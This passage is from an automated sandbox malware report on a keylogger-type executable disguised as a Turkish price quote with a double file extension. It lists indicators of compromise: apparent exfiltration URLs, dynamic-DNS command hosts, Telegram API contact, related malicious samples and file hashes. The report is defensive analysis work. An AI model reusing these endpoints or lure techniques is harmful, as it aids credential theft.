                                                              https://www.ecosia.org/newtab/fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://varders.kozow.com:8081fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                http://aborters.duckdns.org:8081fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://ac.ecosia.org/autocomplete?q=fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://51.38.247.67:8081/_send_.php?Lfiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002D1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://anotherarmy.dns.army:8081fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: phishing
                                                                  		unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://checkip.dyndns.org/qfiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://reallyfreegeoip.org/xml/8.46.123.189$fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://reallyfreegeoip.orgfiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1310525073.0000000003402000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedfiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://reallyfreegeoip.org/xml/fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                149.154.167.220
                                                                                		api.telegram.orgUnited Kingdom
                                                                                		62041TELEGRAMRUfalse
                                                                                104.21.64.1
                                                                                		reallyfreegeoip.orgUnited States
                                                                                		13335CLOUDFLARENETUSfalse
                                                                                132.226.247.73
                                                                                		checkip.dyndns.comUnited States
                                                                                		16989UTMEMUSfalse

                                                                                General Information

                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                Analysis ID:1586927
                                                                                Start date and time:2025-01-09 19:08:34 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 5m 48s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:17
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                renamed because original name is a hash value
                                                                                Original Sample Name:fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Siparii jpeg docx .exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@8/6@3/3
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:
                                                                                • Successful, ratio: 99%
                                                                                • Number of executed functions: 227
                                                                                • Number of non-executed functions: 73
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 4.245.163.56
                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                • VT rate limit hit for: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                13:09:31API Interceptor1376795x Sleep call for process: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe modified
                                                                                13:09:32API Interceptor9x Sleep call for process: powershell.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                149.154.167.220fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                      gem1.exeGet hashmaliciousUnknownBrowse
                                                                                        Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                              PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    104.21.64.1QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.mzkd6gp5.top/3u0p/
                                                                                                    Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                                    • ordrr.statementquo.com/QCbxA/
                                                                                                    SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                    • adsfirm.com/administrator/index.php
                                                                                                    PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.bser101pp.buzz/v89f/
                                                                                                    132.226.247.731C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    reallyfreegeoip.orgfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 104.21.112.1
                                                                                                    1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 104.21.96.1
                                                                                                    jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                    • 104.21.16.1
                                                                                                    Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 104.21.16.1
                                                                                                    Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                    • 104.21.64.1
                                                                                                    Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 104.21.16.1
                                                                                                    CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 104.21.96.1
                                                                                                    Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 104.21.80.1
                                                                                                    Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 104.21.96.1
                                                                                                    December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.48.1
                                                                                                    checkip.dyndns.comfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 132.226.247.73
                                                                                                    jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                    • 132.226.8.169
                                                                                                    Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 193.122.130.0
                                                                                                    Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 193.122.130.0
                                                                                                    fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 132.226.8.169
                                                                                                    Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 132.226.247.73
                                                                                                    Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 193.122.6.168
                                                                                                    api.telegram.orgfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    gem1.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 149.154.167.220
                                                                                                    bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                    • 149.154.167.220
                                                                                                    PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 149.154.167.220
                                                                                                    BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    TELEGRAMRUfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    gem1.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    DyM4yXX.exeGet hashmaliciousVidarBrowse
                                                                                                    • 149.154.167.99
                                                                                                    JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 149.154.167.220
                                                                                                    bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                    • 149.154.167.220
                                                                                                    5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.99
                                                                                                    PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 149.154.167.220
                                                                                                    UTMEMUSfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 132.226.247.73
                                                                                                    jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                    • 132.226.8.169
                                                                                                    Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 132.226.8.169
                                                                                                    Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 132.226.247.73
                                                                                                    JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 132.226.247.73
                                                                                                    pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    CLOUDFLARENETUSfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 104.21.112.1
                                                                                                    1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 104.21.96.1
                                                                                                    jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                    • 104.21.16.1
                                                                                                    0V2JsCrGUB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                    • 104.21.38.84
                                                                                                    https://boutiquedumonde.instawp.xyz/wp-content/themes/twentytwentyfive/envoidoclosa_toutdomaine/wetransfer/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                    • 1.1.1.1
                                                                                                    drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    • 172.67.74.152
                                                                                                    Fantazy.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 1.3.115.13
                                                                                                    https://sora-ai-download.com/Get hashmaliciousUnknownBrowse
                                                                                                    • 104.22.20.144
                                                                                                    ReIayMSG__polarisrx.com_#7107380109.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.18.11.207
                                                                                                    Appraisal-nation-Review_and_Signature_Request46074.pdfGet hashmaliciousUnknownBrowse
                                                                                                    • 104.26.5.30

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 104.21.64.1
                                                                                                    1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 104.21.64.1
                                                                                                    jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                    • 104.21.64.1
                                                                                                    Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 104.21.64.1
                                                                                                    Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                    • 104.21.64.1
                                                                                                    Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 104.21.64.1
                                                                                                    CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 104.21.64.1
                                                                                                    Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 104.21.64.1
                                                                                                    Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 104.21.64.1
                                                                                                    December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.64.1
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eRFQ-12202430_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    PO-12202432_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                    • 149.154.167.220
                                                                                                    JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 149.154.167.220
                                                                                                    bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                    • 149.154.167.220
                                                                                                    s7.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                    • 149.154.167.220

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1396
                                                                                                    Entropy (8bit):5.337066511654157
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhgLE4qXKIE4oKNzKoZAE4Kze0E4qE4x84j:MIHK5HKH1qHiYHKh3ogLHitHo6hAHKze
                                                                                                    MD5:55A2AF8F9FCA3AE99FBA235D3E16A53F
                                                                                                    SHA1:32F34219599006657BFF0B868257916A0C393AAA
                                                                                                    SHA-256:2E0B5859D8501D26669B982BD18005B625352435DB8E1D8B944EED350C1DB0B3
                                                                                                    SHA-512:F6EB6E6AA729963FF23349B6DF3B558896C7B294BF15F6601C4FEF2B1034DEBE207CE04A85F14124CBC41B168157778A23BAA06FCCFE13B0EE262CF2D80FDDA6
                                                                                                    Malicious:true
                                                                                                    Reputation:low
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5619

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1172
                                                                                                    Entropy (8bit):5.356731422178564
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3CytZWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:yyjWSU4xympjms4RIoU99tK8NDv
                                                                                                    MD5:68CB8F49FDE7FC3DF6CEE19CB730C7F8
                                                                                                    SHA1:1EC425657E358C85CA4A3A04E6525E29B59FCB16
                                                                                                    SHA-256:5DA91A846188B8604BEE0056451D6185AA1B91646196C90699ADFF530F8BC555
                                                                                                    SHA-512:D3FB70289E5CD0287009394E3C9485467999DB61F9AB74D16C9E6D0CF7D0A2411BF0F165EF24D5E7BB71FCAF78A84F5499600074ED2A3FE4F8AE47CF09654415
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
